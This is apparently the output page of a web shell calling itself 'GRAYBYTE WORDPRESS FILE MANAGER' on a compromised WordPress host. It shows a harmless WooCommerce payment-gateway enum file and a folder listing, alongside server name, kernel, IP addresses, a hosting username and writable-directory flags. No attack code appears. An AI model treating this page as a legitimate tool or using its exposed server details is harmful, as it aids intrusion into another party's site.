✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/builxejc/public_html/wp-content/plugins/woocommerce/src/Enums//PaymentGatewayFeature.php
<?php

declare( strict_types = 1 );

namespace Automattic\WooCommerce\Enums;

/**
 * Enum class for all the payment gateway feature's values.
 */
final class PaymentGatewayFeature {
	/**
	 * Payment gateway supports add payment methods.
	 *
	 * @var string
	 */
	public const ADD_PAYMENT_METHOD = 'add_payment_method';

	/**
	 * Payment gateway supports credit card form on saved method.
	 *
	 * @var string
	 */
	public const CREDIT_CARD_FORM_CVC_ON_SAVED_METHOD = 'credit_card_form_cvc_on_saved_method';

	/**
	 * Payment gateway supports default credit card form.
	 *
	 * @var string
	 */
	public const DEFAULT_CREDIT_CARD_FORM = 'default_credit_card_form';

	/**
	 * Payment gateway supports deposits.
	 *
	 * @var string
	 */
	public const DEPOSITS = 'deposits';

	/**
	 * Payment gateway supports multiple subscriptions.
	 *
	 * @var string
	 */
	public const MULTIPLE_SUBSCRIPTIONS = 'multiple_subscriptions';

	/**
	 * Payment gateway supports pay button.
	 *
	 * @var string
	 */
	public const PAY_BUTTON = 'pay_button';

	/**
	 * Payment gateway supports pre-orders.
	 *
	 * @var string
	 */
	public const PRE_ORDERS = 'pre-orders';

	/**
	 * Payment gateway supports products.
	 *
	 * @var string
	 */
	public const PRODUCTS = 'products';

	/**
	 * Payment gateway supports refunds.
	 *
	 * @var string
	 */
	public const REFUNDS = 'refunds';

	/**
	 * Payment gateway supports subscription amount changes.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_AMOUNT_CHANGES = 'subscription_amount_changes';

	/**
	 * Payment gateway supports subscription cancellation.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_CANCELLATION = 'subscription_cancellation';

	/**
	 * Payment gateway supports subscription date changes.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_DATE_CHANGES = 'subscription_date_changes';

	/**
	 * Payment gateway supports subscription payment method changes.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_PAYMENT_METHOD_CHANGE = 'subscription_payment_method_change';

	/**
	 * Payment gateway supports subscription payment method changes by admin.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_PAYMENT_METHOD_CHANGE_ADMIN = 'subscription_payment_method_change_admin';

	/**
	 * Payment gateway supports subscription payment method changes by customer or admin.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_PAYMENT_METHOD_CHANGE_CUSTOMER = 'subscription_payment_method_change_customer';

	/**
	 * Payment gateway supports subscription reactivation.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_REACTIVATION = 'subscription_reactivation';

	/**
	 * Payment gateway supports subscription suspension.
	 *
	 * @var string
	 */
	public const SUBSCRIPTION_SUSPENSION = 'subscription_suspension';

	/**
	 * Payment gateway supports subscriptions.
	 *
	 * @var string
	 */
	public const SUBSCRIPTIONS = 'subscriptions';

	/**
	 * Payment gateway supports tokenization.
	 *
	 * @var string
	 */
	public const TOKENIZATION = 'tokenization';

	/**
	 * Agentic Commerce feature.
	 */
	public const AGENTIC_COMMERCE = 'agentic_commerce';
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
9 Jun 2026 8.39 AM
builxejc / builxejc
0755
CatalogVisibility.php
0.602 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
DefaultCustomerAddress.php
0.703 KB
5 May 2026 2.26 PM
builxejc / builxejc
0644
FeaturePluginCompatibility.php
0.777 KB
6 Oct 2025 5.56 PM
builxejc / builxejc
0644
OrderInternalStatus.php
0.925 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
OrderItemType.php
0.625 KB
5 May 2026 2.26 PM
builxejc / builxejc
0644
OrderStatus.php
2.187 KB
6 Oct 2025 5.56 PM
builxejc / builxejc
0644
PaymentGatewayFeature.php
3.026 KB
24 Nov 2025 11.10 PM
builxejc / builxejc
0644
ProductStatus.php
0.86 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
ProductStockStatus.php
0.569 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
ProductTaxStatus.php
0.521 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
ProductType.php
0.618 KB
23 Jun 2025 7.46 PM
builxejc / builxejc
0644
TaxBasedOn.php
0.634 KB
5 May 2026 2.26 PM
builxejc / builxejc
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF